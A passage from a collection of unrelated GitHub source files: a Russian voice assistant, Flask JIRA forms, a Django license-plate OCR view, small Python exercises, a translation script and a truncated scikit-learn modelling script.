= 0\r\nwhile i < NumberOfHelper:\r\n if 'Tatyana RSI' in voices[i].id:\r\n print(voices[i].id)\r\n tts.setProperty('voice', voices[i].id)\r\n i += 1\r\n\r\n#Приветствие голосового помошника\r\nassistantGreeting = \"Привет! Меня зовут Лили'т! Чем я' могу' , вам помо'чь? \"\r\ntts.say( assistantGreeting )\r\ntts.runAndWait()\r\n\r\n#Фразы, чтобы позвать помошника, или \"отпустить\"\r\nreleaseAssistant = ['лилит', 'лилия', 'лиля', 'ли ли', 'лил', 'лилии', 'лилию', 'вернись',\r\n 'ли вернись', 'ли ты где', 'бот', 'робот', 'робот', 'комп', 'компьютер' ]\r\ncallAssistant = [ 'пока', 'уйди', 'спасибо ты не нужна', 'скройся', 'исчезни', 'ты не нужна', \r\n'давай потом', 'затихни', 'тихо', 'жди', 'ожидай','режим ожидания', 'ожидание' ,\r\n'протокол ждун', 'режим ждун', 'запустить режим ждун', 'режим жди', 'ждун', 'стать ждуном',\r\n'будь ждуном', 'ты ждун', 'обожди', 'жди меня', 'помолчи','испарись'\r\n'протокол ожидание', 'запустить протокол ожидания', 'запустить режим ожидания','всё' ]\r\n\r\nstartlisteningMode=\"0\"\r\n\r\n#функция говорения помощника через питон, звук воспроизводится на компьюторе\r\n#не подходит для решений, где хотелось бы слышать ответы через телефон\r\ndef assistantSays(text):\r\n tts.say( text )\r\n tts.runAndWait()\r\n\r\n#Класс для поиска решений Ассистентом \r\nclass findSolution():\r\n\r\n def __init__(self, text): \r\n self.__querval = text \r\n \r\n def findAnswer(self):\r\n\r\n dirQuervals = {\r\n 'https://vk.com/feed': [ 'открой вк' , 'открой vk' ] ,\r\n 'https://vk.com/im?v=' : [ 'открой сообщения' ] ,\r\n 'https://www.youtube.com/' : [ 'открой ютуб' ,'открой youtube' ] ,\r\n 'C:\\Program Files (x86)\\Bandicam\\Loader.exe' : [ 'открой bandicam' , 'запись экрана'] ,\r\n 'https://sber-zvuk.com/playlists' : [ 'не знаю что послушать' ] ,\r\n 'https://sber-zvuk.com/genres' : [ 'открой категории' ] ,\r\n 'https://www.google.com/search?q=' : [ 'фильм', 'сериал' , 'аниме' ] ,\r\n 'https://sber-zvuk.com/search?query=' : [ 'найди музыку' ] ,\r\n 'https://www.google.com/search?q=' : [ 'найти на google' , 'найти на гугл' ] ,\r\n 'https://www.youtube.com/results?search_query=' : [ 'найти на youtube' , 'найти на ютуб'] ,\r\n 'https://sber-zvuk.com/genre/hiphop': [ \"хочу хип-хоп\" , \"хочу хипхоп\" , \"хочу хип хоп\" ] ,\r\n 'https://sber-zvuk.com/genre/relax' : [ \"хочу отдых\" ] ,\r\n 'https://sber-zvuk.com/genre/party' : [ \"хочу вечеринку\"] ,\r\n 'https://sber-zvuk.com/genre/pop' : [ \"хочу попсу\"] ,\r\n 'https://sber-zvuk.com/genre/sport' : [ \"хочу тренировку\", \"хочу зарядку\", \"хочу спорт\"] ,\r\n 'https://sber-zvuk.com/genre/rock' : [ \"хочу рок\" , \"рок\" , \"хочу rock\" , \"rock\" ] ,\r\n 'https://sber-zvuk.com/genre/motivation' : [ 'хочу мотивацию' , \"мотивацию\" , \"мотивация\" ] ,\r\n 'https://sber-zvuk.com/genre/melancholy' : [ 'хочу меланхолию' , \"хочу погрустить\" ] ,\r\n 'https://sber-zvuk.com/genre/travel' : [ 'хочу путешестовать' , 'хочу в путешествие' ] \r\n }\r\n\r\n for answer, quervals in dirQuervals.items():\r\n if self.__querval in quervals:\r\n return answer\r\n return \"\"\r\n \r\n def helpUser( self, Querval , text ): \r\n print(Querval)\r\n solution = \"\"\r\n dirSolution = {\r\n 'disk' : [ 'D:' , 'C:' ] ,\r\n 'url' : 'http' ,\r\n } \r\n \r\n for answer, solutions in dirSolution.items():\r\n for i in range(len(solutions)):\r\n if solutions[i] in Querval:\r\n solution = answer\r\n \r\n if ( solution=='url' ): \r\n songAppearance.play()\r\n songExecutes.play()\r\n webbrowser.open_new(Querval)\r\n\r\n if 'хочу' in text:\r\n time.sleep(6)\r\n 
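# simulate a mouse click and a spacebar press so playback starts in the tab that was just opened\r\n                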
pag.click()\r\n time.sleep(2)\r\n pag.press('space')\r\n time.sleep(2)\r\n tts.say('Надеюсь вам понравиться!')\r\n eel.call_in_py('Надеюсь вам понравиться!')\r\n tts.runAndWait()\r\n\r\n\r\n if ( solution =='disk'):\r\n songAppearance.play()\r\n songExecutes.play()\r\n subprocess.Popen(Querval)\r\n\r\n\r\n\r\ndef record_volume(listeningMode):\r\n r = sr.Recognizer()\r\n with sr.Microphone(device_index = 1) as source:\r\n print('Настраиваюсь.')\r\n r.adjust_for_ambient_noise(source, duration=1)\r\n\r\n print('Слушаю...')\r\n audio = r.listen(source)\r\n try:\r\n query = r.recognize_google(audio, language = 'ru-RU')\r\n text = query.lower()\r\n\r\n\r\n if text in callAssistant:\r\n print('off')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n eel.call_in_py3(text)\r\n eel.call_in_py('Хорошо..')\r\n #tts.say('Хорошо...')\r\n tts.save_to_file('Хорошо...', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n tts.runAndWait()\r\n listeningMode=\"off\";\r\n\r\n if text in releaseAssistant:\r\n \r\n print('on')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n eel.call_in_py3(text)\r\n #tts.say('Да, господин! Вам.. Что-то нужно? ')\r\n tts.save_to_file('Да, господин! Что нужно?', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n tts.runAndWait()\r\n listeningMode=\"on\";\r\n\r\n if (listeningMode == 'on'):\r\n if text in releaseAssistant:\r\n print('Вы позвали лилит')\r\n else:\r\n print(f'Вы сказали: {query.lower()}')\r\n eel.call_in_py3(text)\r\n \r\n objectSolution = findSolution(text)\r\n Querval = objectSolution.findAnswer()\r\n objectSolution.helpUser(Querval, text)\r\n \r\n except:\r\n if listeningMode == 'on' and startlisteningMode == 'on' : \r\n tts.say('Ой, я не поняла.')\r\n eel.call_in_py('Ой, я не поняла.')\r\n tts.runAndWait()\r\n\r\n #print(listeningMode)\r\n newlisteningMode= listeningMode\r\n return newlisteningMode\r\n\r\n@eel.expose\r\ndef text_talk(text):\r\n if text in callAssistant:\r\n print('off')\r\n #tts.say('Хорошо...')\r\n num_rand = random.randint(-1000000, 1000000)\r\n\r\n tts.save_to_file('Хорошо...', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n eel.call_in_py('Хорошо...', num_rand)\r\n tts.runAndWait()\r\n\r\n\r\n if text in releaseAssistant:\r\n print('on')\r\n \r\n num_rand = random.randint(-1000000, 1000000)\r\n \r\n tts.save_to_file('Да, господин! Что нужно?', \"./web/audio/answer\" + str(num_rand) + \".mp3\" )\r\n eel.call_in_py('Да, господин! Вам.. Что-то нужно? ', num_rand)\r\n #tts.say('Да, господин! Вам.. 
Что-то нужно?')\r\n tts.runAndWait()\r\n\r\n objectSolution = findSolution(text)\r\n Querval = objectSolution.findAnswer()\r\n objectSolution.helpUser(Querval, text)\r\n \r\n return 0\r\n\r\n@eel.expose\r\ndef call_in_js(x):\r\n print(x)\r\n\r\n@eel.expose\r\ndef call_in_Li(x):\r\n print(x)\r\n\r\n@eel.expose\r\ndef test_on_off(x):\r\n startlisteningMode = x\r\n if startlisteningMode==\"on\":\r\n songAppearance.play()\r\n if startlisteningMode==\"off\":\r\n songDisappearance.play()\r\n print(x)\r\n return startlisteningMode\r\n\r\ndef my_other_thread1():\r\n listeningMode=\"on\"\r\n while True:\r\n startlisteningMode = eel.call_in_py2()()\r\n if startlisteningMode==\"on\":\r\n listeningMode = record_volume(listeningMode)\r\n\r\n\r\n#eel.call_in_py(\"Test Py\")\r\neel.spawn(my_other_thread1)\r\neel.start(\"helper.html\", size = (1920,1080), blocking= False)\r\n","repo_name":"markgrig/vois_helper","sub_path":"Talk.py","file_name":"Talk.py","file_ext":"py","file_size_in_byte":10457,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9274362737","text":"import textwrap\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import Required\nfrom ...models import Project, JIRAIssueType, JIRAParentIssue, JIRAMember,\\\n SubscribedJIRAProject, SubscribedJIRAIssue\n\n\nclass NewForm(FlaskForm):\n \"\"\"Form for creating a subscribed_jira_item.\"\"\"\n issue_key = StringField(\n 'Issue Key',\n description=textwrap.dedent(\n \"\"\"\n The key of a JIRA issue associated with the subscribed JIRA project\n (leave empty for a non-subtask issue)\n \"\"\"\n )\n )\n issue_type_name = StringField(\n 'Issue Type',\n description=textwrap.dedent(\n \"\"\"\n The name of the issue type for JIRA issues to be created under this\n subscribed item (defaults to `Sub-task` or `Subtask` if no JIRA issue is\n specified)\n \"\"\"\n )\n )\n jira_id = StringField(\n 'JIRA Member ID',\n description=textwrap.dedent(\n \"\"\"\n An optional field to specify the JIRA ID for a member to be\n automatically assigned to any JIRA Issues created on this list\n \"\"\"\n )\n )\n submit = SubmitField('Create')\n\n def __init__(self, project_key, repo_id):\n \"\"\"Sets the `project_key` for the form.\"\"\"\n FlaskForm.__init__(self)\n self._project_key = project_key\n self._repo_id = repo_id\n\n def validate(self):\n \"\"\"Performs validations of the form field values.\n\n - Validates the `issue_key` attribute is a `JIRAParentIssue.jira_issue_key`\n belonging to the `Project` with `project_key`.\n - Validates the `jira_member_id `attribute belongs to a\n `JIRAMember`\n \"\"\"\n issue_key = self.issue_key.data.strip()\n jira_id = self.jira_id.data.strip()\n issue_type_name = self.issue_type_name.data.strip()\n\n if issue_key:\n jira_issue = JIRAParentIssue.query.filter_by(\n jira_issue_key=issue_key, project_key=self._project_key\n ).first()\n\n if jira_issue is None:\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Issue '{issue_key}' does not exist for project '{self._project_key}'\n \"\"\"\n )\n return False\n\n # Validate the `SubscribedList` does not already exist\n if bool(SubscribedJIRAIssue.query.get(\n [self._project_key, self._repo_id, issue_key]\n )):\n self._error_message = textwrap.dedent(\n f\"\"\"\n Subscribed JIRA issue {issue_key} exists for {self._project_key}, {self._repo_id}\n \"\"\"\n )\n return False\n else:\n if bool(SubscribedJIRAProject.query.get(\n [self._project_key, self._repo_id]\n )):\n 
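# a SubscribedJIRAProject already exists for this (project, repo) pair, so reject the duplicate subscription\n                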
self._error_message = textwrap.dedent(\n f\"\"\"\n Subscribed JIRA project exists for {self._project_key}, {self._repo_id}\n \"\"\"\n )\n return False\n\n # Get the `issue_key` to return back to `views.py`\n self._issue_key = issue_key\n\n # `jira_issue_type` is optional only if no SubscribedJIRAProject exists for this subscription\n if not issue_key:\n if not issue_type_name:\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Issue Type required for non-subtask subscriptions\n \"\"\"\n )\n return False\n else:\n project = Project.query.filter_by(key=self._project_key).first()\n for jira_issue_type in JIRAIssueType.query.filter_by(name=issue_type_name):\n if bool(project.issue_types.filter_by(\n issue_type_id=jira_issue_type.issue_type_id)\n ):\n issue_type = jira_issue_type\n break\n if not issue_type:\n self._error_message = textwrap.dedent(\n f\"\"\"\n Issue type {issue_type_name} does not exist for project with key {project.key}\n \"\"\"\n )\n return False\n\n if issue_type.subtask:\n self._error_message = textwrap.dedent(\n f\"\"\"\n Issue type {issue_type_name} for project with key {project.key} is a subtask issue type\n \"\"\"\n )\n return False\n else:\n issue_type = None\n\n self._issue_type = issue_type.issue_type_id if issue_type else None\n\n # `jira_member_id` is optional\n if not jira_id:\n self._jira_member_id = None\n return True\n\n jira_member = JIRAMember.query.filter_by(\n jira_member_id=jira_id\n ).first()\n\n if not bool(jira_member):\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Member '{jira_id}' does not exist\n \"\"\"\n )\n return False\n\n # Get the `jira_member_id` to return back to `views.py`\n self._jira_member_id = jira_member.jira_member_id\n\n # All custom validations passed\n return True\n\n def get_issue_key(self):\n return self._issue_key\n\n def get_issue_type(self):\n return self._issue_type\n\n def get_jira_member_id(self):\n return self._jira_member_id\n\n def get_error_message(self):\n return self._error_message\n\n\nclass UpdateForm(FlaskForm):\n \"\"\"Form for updating an existing subscribed jira item.\"\"\"\n jira_update_id = StringField('JIRA Member ID')\n submit = SubmitField('Update')\n\n def validate(self):\n \"\"\"Performs validations of the form field values.\n\n - Validates the `jira_member_id `attribute belongs to a\n `JIRAMember`\n \"\"\"\n jira_id = self.jira_update_id.data.strip()\n\n # `jira_member_id` is optional\n if not jira_id:\n self._jira_member_id = None\n return True\n\n jira_member = JIRAMember.query.filter_by(\n jira_member_id=jira_id\n ).first()\n\n if not bool(jira_member):\n self._error_message = textwrap.dedent(\n f\"\"\"\n JIRA Member '{jira_id}' does not exist\n \"\"\"\n )\n return False\n\n # Get the `jira_member_id` to return back to `views.py`\n self._jira_member_id = jira_member.jira_member_id\n\n # All custom validations passed\n return True\n\n def get_jira_member_id(self):\n return self._jira_member_id\n\n def get_error_message(self):\n return self._error_message\n\n\nclass DeleteForm(FlaskForm):\n \"\"\"Form for deleting an existing subscribed_list.\"\"\"\n submit = SubmitField('Delete')\n","repo_name":"DataDog/gello","sub_path":"app/controllers/subscribed_jira_items/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31119478829","text":"best_config = {\n \"observation_filter\": \"MeanStdFilter\",\n \"model\": {\"free_log_std\": True},\n \"num_sgd_iter\": 
10,\n \"sgd_minibatch_size\": 128,\n \"lambda\": 0.731396,\n \"clip_param\": 0.317651,\n \"lr\": 5e-05,\n \"train_batch_size\": 18812,\n}\n","repo_name":"TrendingTechnology/smart-cities-drl","sub_path":"src/wastenet/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"9609945579","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom accounts.decorators import unauthenticated_user\nfrom accounts.models import *\n\n\n# imports for OenCV and OCR\nimport cv2\nimport pytesseract\nimport matplotlib.pyplot as plt\n\n# Create your views here.\n@login_required(login_url='login')\ndef detectFn(request):\n\n ###############################################\n frameWidth = 640\n frameHeight = 480\n\n new_path = 'F:/UTA Summer 2021/Senior design II/venvir/Lib/site-packages/cv2/'\n nPlateCascade = cv2.CascadeClassifier(new_path + 'data/haarcascade_russian_plate_number.xml')\n minArea = 200\n color = (255,0,255)\n ###############################################\n # cap = cv2.VideoCapture(\"Resources/video12.mp4\") # comment left for rererence \n cap = cv2.VideoCapture(0)\n cap.set(3, frameWidth)\n cap.set(4, frameHeight)\n cap.set(10,150)\n count = 0\n\n while True:\n success, img = cap.read()\n\n # press key 'd' to deactivate the camera/terminate the detection program\n if cv2.waitKey(1) & 0xFF == ord('d'):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n cv2.waitKey(1)\n messages.success(request,'License detection deactivated.')\n return redirect('dashboard')\n\n # img = cv2.imread('Resources/lena.png') # comment left for rererence \n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n numberPlates = nPlateCascade.detectMultiScale(imgGray, 1.1, 10)\n for (x, y, w, h) in numberPlates:\n area = w*h\n if area >minArea:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 255), 2)\n cv2.putText(img,\"Number Plate\",(x,y-5),\n cv2.FONT_HERSHEY_COMPLEX_SMALL,1,color,2)\n imgRoi = img[y:y+h,x:x+w]\n cv2.imshow(\"ROI\", imgRoi)\n\n cv2.imshow(\"Result\", img)\n\n # press key 's' to save the detected license plate\n if cv2.waitKey(1) & 0xFF == ord('s'):\n cv2.imwrite(\"static/scanned/NoPlate_\"+str(count)+\".jpg\",imgRoi)\n cv2.rectangle(img,(0,200),(640,300),(0,255,0),cv2.FILLED)\n cv2.putText(img,\"Scan Saved\",(150,265),cv2.FONT_HERSHEY_DUPLEX,\n 2,(0,0,255),2)\n cv2.imshow(\"Result\",img)\n cv2.waitKey(500)\n\n\n # program segment to read scanned license plates using OCR\n pytesseract.pytesseract.tesseract_cmd = 'F:/UTA Summer 2021/Senior design II/venvir/Lib/site-packages/Tesseract-OCR/tesseract.exe'\n # image_location = '../static/scanned/NoPlate_0.jpg' # comment left for rererence \n image_location = 'static/scanned/NoPlate_'+str(count)+'.jpg'\n ocr_img = cv2.imread(image_location)\n\n predicted_license = pytesseract.image_to_string(ocr_img)\n # predicted_license = pytesseract.image_to_string(ocr_img, lang ='eng',\n # config ='--oem 3 --psm 6 -c tessedit_char_whitelist = ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') # comment left for rererence \n\n filter_predicted_license = \"\".join(predicted_license.split()).replace(\":\", \"\").replace(\"-\", \"\")\n print('\\n')\n print(\"OCR result: \" + predicted_license)\n print(\"Filtered OCR result: \" + filter_predicted_license)\n\n\n try:\n vehicle = Vehicle.objects.get(license_plate = 
filter_predicted_license)\n print(\"Gate opened and access allowed for vehicle \" + filter_predicted_license + \".\")\n print('\\n')\n\n # TODO\n # Initial parking status:\n print(\"Initial parking status: \" + str(vehicle.parked))\n if vehicle.parked is False:\n vehicle.parked=True\n vehicle.save()\n print('The vehicle [' + filter_predicted_license + '] entered the parking garage.')\n messages.success(request,'The vehicle [' + filter_predicted_license + '] entered the parking garage.')\n \n else:\n vehicle.parked=False\n vehicle.save()\n print('The vehicle [' + filter_predicted_license + '] exited the parking garage.')\n messages.success(request,'The vehicle [' + filter_predicted_license + '] exited the parking garage.')\n\n # Final parking status:\n print(\"Final parking status: \" + str(vehicle.parked)) \n print('\\n') \n\n except ObjectDoesNotExist:\n print(\"Access denied for vehicle \" + filter_predicted_license + \". Please register your vehicle.\")\n print('\\n')\n messages.warning(request,'Access denied for vehicle ' + filter_predicted_license + '. Please register your vehicle.')\n \n\n # increment count for another image\n # since 'detect' url is triggered again at the end of 'detectFn' the increment in count doesn't make any difference(i.e updates NoPlate_0 again and again), however,\n # if any other pages is to be rendered or any other url/function is to be redirected, in that case the same openCv window\n # can be used to detect as many number plates as possible unless the window is terminated\n count +=1\n\n return redirect('detect')\n\n # this code segment has been moved up from here for better performance/easy termination of the detection program\n # # press key 'd' to deactivate the camera/terminate the detection program (this elif condition if put here only works while the rectange has been detected\n # and is in the state of being recognized)\n # elif cv2.waitKey(1) & 0xFF == ord('d'):\n # cv2.waitKey(1)\n # cv2.destroyAllWindows()\n # cv2.waitKey(1)\n # messages.success(request,'License detection deactivated.')\n # return redirect('dashboard')\n\n@login_required(login_url='login')\ndef notificationsFn(request):\n return render(request, 'license/notifications.html')\n","repo_name":"Vyadavgit/ALPR-System-senior-design-project","sub_path":"ALPR_System/license/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5722406038","text":"from datetime import datetime, timedelta\n\njulAfton = datetime(2021,12,24)\nidag = datetime.now()\ntimespan = julAfton - idag\nprint(f\"Det är {timespan.days} dagar\")\n\ninvoiceDate = datetime.now()\nforFalloDag = invoiceDate + timedelta(days=32)\nprint(forFalloDag.weekday())\nif forFalloDag.weekday() == 5:\n forFalloDag = forFalloDag - timedelta(days=1)\nif forFalloDag.weekday() == 6:\n forFalloDag = forFalloDag + timedelta(days=1)\n\nformattedInvoiceDate = invoiceDate.strftime('%Y-%m-%d')\nprint(f\"Fakturadatum: {formattedInvoiceDate}\")\nformattedForFalloDag = forFalloDag.strftime('%Y-%m-%d')\nprint(f\"Förfallodag: {formattedForFalloDag}\")\n\nwhile True:\n print(\"Skriv in din födelsedag - ex 1972-08-03:\")\n datum = input()\n dat = datetime.strptime(datum, \"%Y-%m-%d\" )\n print(f\"Du är född på en {dat.weekday()}\")\n\nprecisNu = datetime.now()\n#print(precisNu)\n\n#snyggTid = f\"{precisNu.year}-{precisNu.month}-{precisNu.day}\"\nsnyggTid = precisNu.strftime(\"%Y-%m-%d\")\nprint(snyggTid)\n\n\n\nettAnnat = 
datetime(1972,8,3)\r\n\r\n\r\njagArFoddDettaDatum = datetime(1972,8,3)\r\nprint(jagArFoddDettaDatum.weekday() )\r\n\r\nweekDays = [\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"]\r\n\r\nprint(weekDays[3])\r\nprint(weekDays[jagArFoddDettaDatum.weekday()])\r\n\r\n\r\nlista = [12,22,33]\r\ndc = { \"Namn\":\"Kalle\", \"Adress\":\"Hejgatan12\"}\r\nprint(dc['Namn'])\r\n\r\nidag = datetime.now()\r\n\r\nif idag.day != 1:\r\n    print(\"Kör batch\")\r\n\r\nprint(idag.year)\r\nprint(idag.month)\r\nprint(idag.day)\r\n#DEBUG OCH SE. Hmmm\r\n# i denna \"låda\" idag ligger\r\n# det massa delar inte som lista/dictionary\r\n#utan på ett tredje sätt. What???\r\n#Hello OOP ;)\r\nprint(idag)","repo_name":"aspcodenet/PythonDateDemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8633628953","text":"petStore = [\n    {'pet': 'dog', 'qty': 10},\n    {'pet': 'cat', 'qty': 5},\n    {'pet': 'bird', 'qty': 3}\n]\n\npet = input('Enter a pet:')\n\nindex = 0\n\nwhile index < len(petStore):\n    item = petStore[index]\n    # check the pet name\n    if item['pet'] == pet:\n        print(f\"The petStore has {item['qty']} {item['pet']}(s)\")\n        found_it = True\n        break\n\n    index += 1\nelse:\n    qty = int(input(f'Enter the qty for {pet}:'))\n    petStore.append({'pet': pet, 'qty': qty})\n    print(petStore)\n    ","repo_name":"Achyut-Labs/python-seva","sub_path":"class-7/whileelseDurva 2.Py","file_name":"whileelseDurva 2.Py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31401831946","text":"# -*- coding: utf-8 -*-\r\n'''\r\n# Created on Mar-17-20 09:22\r\n# translateContent.py\r\n# @author: Lucius\r\n'''\r\nimport os, django, sys\r\nsys.path.append(os.path.dirname(os.path.abspath('.')))\r\nos.environ['DJANGO_SETTINGS_MODULE'] = 'translate.settings'\r\ndjango.setup()\r\nimport requests\r\nimport json\r\n\r\nfrom spiderAndTranslate.models import UserProfile, OriginalBooks, OriginalBooksContent, TanslationBookContentVI, TranslationBooksVI\r\nfrom spiderAndTranslate.utils.baiduTranslateVn import BaiduTranslation\r\n\r\n\r\nbooks_vi = TranslationBooksVI.objects.all()\r\n\r\nfor book_vi in books_vi:\r\n    book_content = OriginalBooksContent.objects.filter(book = book_vi.book)\r\n    existed_book = TanslationBookContentVI.objects.filter(book = book_vi)\r\n    if existed_book:\r\n        print (\"It is an existed book\")\r\n    else:\r\n        if book_content:\r\n            try:\r\n                for content in book_content:\r\n                    book_content_vi = TanslationBookContentVI()\r\n                    book_content_vi.book = book_vi\r\n                    print(content.chapter_name)\r\n                    book_content_vi.chapter_name = BaiduTranslation(content.chapter_name, 'zh', 'vie').translate()\r\n                    print(BaiduTranslation(content.chapter_name, 'zh', 'vie').translate())\r\n                    book_content_vi.chapter_index = content.chapter_index\r\n                    book_content_vi.chapter_content = BaiduTranslation(content.chapter_content, 'zh', 'vie').translate()\r\n                    book_content_vi.words = content.words\r\n                    book_content_vi.save()\r\n            except:\r\n                print(\"book_id:\" + book_vi.book_name + \";\" + \"book_index:\" + book_content_vi.chapter_index)\r\n                print(\"save error\")","repo_name":"a69186005/fiction_website","sub_path":"translate/utils/translateContentVn.py","file_name":"translateContentVn.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5843057985","text":"import heapq\ndef 
solution(jobs): #[[0, 3], [1, 9], [2, 6]]\n answer = 0\n end, i = 0, 0\n start = -1\n hq = []\n while len(jobs) > i:\n for job in jobs:\n if start< job[0] <= end:\n heapq.heappush(hq, (job[1], job[0])) # 3, 0\n print(\"hq\", hq)\n if len(hq) > 0:\n now = heapq.heappop(hq)\n print(\"now\", now)\n start = end\n print(start)\n end = end + now[0]\n print(end)\n answer = answer + (end-now[1])\n i = i + 1\n else:\n end = end + 1\n answer = answer // len(jobs)\n return answer\nsolution([[0, 3], [1, 9], [2, 6]])","repo_name":"profitjean/algorithm_training","sub_path":"Programmers/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42797632324","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier, \\\n AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport os\npd.set_option('display.max_columns', 200)\npd.set_option('display.max_rows', 500)\n\n\ndef rf_best_features(df, x_cols, n_features, true_col='closed_on_google'):\n '''\n INPUT: dataframe, input columns, number of top features to return,\n and optionally the name of the target column\n OUTPUT: a tuple of the top N features and their corresponding values\n '''\n\n x_columns = df[x_cols]\n\n y_true = df[true_col]\n\n rf_model = RandomForestClassifier(n_estimators=100)\n\n rf_model.fit(x_columns, y_true)\n\n feature_importances = {}\n\n for i in range(len(rf_model.feature_importances_)):\n\n feature_importances[x_columns.columns[i]] = rf_model.feature_importances_[i]\n\n top_features = Counter(feature_importances).most_common(n_features)\n\n values = [feature[1] for feature in top_features]\n\n features = [feature[0] for feature in top_features]\n\n return values, features\n\n\ndef plot_roc(model, x_columns, y_true, title=\"model type\"):\n '''\n INPUT: fitted model, array of x values, array of target values, optional:\n title of outputted figure\n OUTPUT: ROC curve with AUC value\n '''\n\n y_pred = model.predict_proba(x_columns)\n\n fpr, tpr, threshold = roc_curve(y_true, y_pred[:, 1])\n area_under_curve = auc(fpr, tpr)\n\n # method I: plt\n fig, ax = plt.subplots()\n if title == \"model type\":\n model_name = str(type(model)).split('.')[-1].strip(\">\\'\")\n else:\n model_name = title\n\n plt.title(f'{model_name} ROC')\n ax.plot(fpr, tpr, 'k', label='C AUC = %0.3f' % area_under_curve)\n\n ax.legend(loc='lower right')\n ax.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig(f'../plots/{model_name} ROC')\n plt.close()\n\n\ndef get_best_features(model, x_cols, n_features):\n '''\n INPUT: fitted model, list of all x columns in model, number of features\n to return\n OUTPUT: tuple of top N features and their associated values\n '''\n\n feature_importances = {}\n\n for i in range(len(model.feature_importances_)):\n\n feature_importances[x_cols[i]] = model.feature_importances_[i]\n\n top_features = Counter(feature_importances).most_common(n_features)\n\n values = [feature[1] for feature in top_features]\n\n features = [feature[0] for feature in top_features]\n\n return values, 
features\n\n\ndef plot_best_features(values, features, name, n_features=10, figsize_x=10, figsize_y=10):\n '''\n INPUT: list of values, list of features, name/title of plot, optional:\n number of features, x and y size of the figure\n title of outputted figure\n OUTPUT: ROC curve with AUC value\n '''\n\n values = values[:n_features]\n\n features = features[:n_features]\n\n new_df = pd.DataFrame(list(zip(values, features))).set_index(1).sort_values(0)\n\n plot = new_df.plot.barh(figsize=(figsize_x, figsize_y), fontsize=100, title=name)\n plot.title.set_size(100)\n fig = plot.get_figure()\n\n fig.savefig(f'../plots/{name}')\n\n\nif __name__ == '__main__':\n if not os.path.exists('../plots'):\n os.makedirs('../plots')\n print(\"Plots folder created.\")\n\n try:\n df = pd.read_json('../data/featurized_dataframe.json')\n print(\"Dataframe read from local .json\")\n except ValueError:\n print(\"Dataframe json being read from s3. Consider running \\'featurize.py\\' first if you'll be running this\\\n multiple times.\")\n df = pd.read_json(\n 'https://s3-us-west-2.amazonaws.com/businesspredictiondata/featurized_dataframe.json')\n\n yelp_basic = ['restaurant_count', 'restaurant_count > 1', 'restaurant_count > 5',\n 'restaurant_count > 25', 'review_count', 'stars']\n\n yelp_categories = [col for col in df.columns if col.startswith('Category')]\n\n yelp_attributes = [col for col in df.columns if col.startswith('Attribute')]\n\n yelp_review_prefixes = ('one_star', 'two_to_four_star', 'five_star')\n yelp_review_features = [col for col in df.columns if col.startswith(yelp_review_prefixes)]\n top_yelp_review_features = rf_best_features(df, yelp_review_features, 100)[1]\n\n all_yelp_columns = yelp_basic + yelp_attributes + yelp_categories + top_yelp_review_features\n\n google_maps_nearby_columns = ['avg_price_level', 'avg_rating', 'num_nearby_restaurants', 'relative rating',\n 'price_level', 'relative_price']\n\n census_columns = ['2016 ACS 5-Year Population Estimate',\n 'American Indian and Alaska Native alone',\n 'Asian alone',\n 'Black or African American alone',\n 'Census 2010 Total Population',\n 'Educational Attainment: Percent high school graduate or higher',\n 'Foreign Born Population',\n 'Hispanic or Latino (of any race)',\n 'Individuals below poverty level',\n 'Median Age',\n 'Median Household Income',\n 'Native Hawaiian and Other Pacific Islander alone',\n 'Some Other Race alone',\n 'Total housing units',\n 'Two or More Races',\n 'Veterans',\n 'White alone']\n\n info_columns = ['name', 'city', 'state', 'postal_code', 'address',\n 'business_id', 'latitude', 'longitude', 'neighborhood']\n\n all_columns = all_yelp_columns + google_maps_nearby_columns + census_columns\n\n print(\"Column groups created\")\n\n x_column_sets = 